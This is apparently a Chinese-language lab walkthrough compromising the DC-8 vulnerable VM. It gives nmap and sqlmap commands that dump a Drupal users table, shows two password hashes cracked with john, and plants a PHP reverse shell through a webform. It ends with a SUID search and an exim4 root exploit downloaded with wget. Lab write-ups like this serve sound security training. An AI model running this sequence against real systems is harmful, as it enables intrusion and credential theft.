下载地址
配置的环境:
kali:192.168.25.131 DC8-靶机 和 kali 在同一C段
渗透
nmap扫描网段,发现存活主机
nmap -sP 192.168.25.0/24
发现主机 192.168.25.129,判定为DC8-靶机,继续使用nmap获取详细信息
nmap -A -p 1-65535 192.168.25.129
开启了ssh,访问靶机ip得知,为Drupal CMS
访问站点,发现注入点,存在报错注入~
sqlmap启动
sqlmap -u http://192.168.25.129/?nid=1%27 --dbs
sqlmap -u http://192.168.25.129/?nid=1%27 -D d7db --tables
sqlmap -u http://192.168.25.129/?nid=2 -D d7db -T users --columns
sqlmap -u http://192.168.25.129/?nid=2 -D d7db -T users -C "uid,name,pass" --dump
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
得到账号和密码的hash,爆破hash 使用john工具(作者站点账户为john,提示~)
用法: john 密码文件
将john的hash放入密码文件中,开始爆破
得到密码 turtle,找后台登录
dirsearch扫描登录目录,扫到/user,登录
参考DC-7靶机后台拿shell,依旧是写入PHP文件反弹,
点击上面的Contact,选择Contact Us,后点击Webform -> form settings,选择PHP code,然后填入DC-7靶机用的反弹脚本
nc监听,回到Contact us主页面,随意填写基本内容,然后提交
.
成功得到一个交互式的shell
python -c "import pty;pty.spawn('/bin/bash')"
看看哪些命令是root权限
find / -perm -4000 2>/dev/null
发现exim4 查看对应版本信息
利用exim4提权,提权需要有写权限,www-data用户在当前目录下无写权限,所以切换到有写权限的/tmp目录下
在靶机上下载提权的exp
wget https://www.exploit-db.com/download/46996脚本需要编辑,因为在本地,可以互通,也本地起一个apache服务,将下载脚本放到kali上,靶机在去kali上下载
提权到root!
执行脚本,报错~
搜索发现这个报错是由于windows下编辑上传到linux下执行导致的
本地编辑查看文件类型 :set ff?,会出现 dos或unix格式,如果为dos,需要改为unix模式
使用 :set ff=unix 修改文件格式 强制为unix格式,并保存退出
重新下载,执行(脚本建议使用高端口,我用的是默认的)
成功!
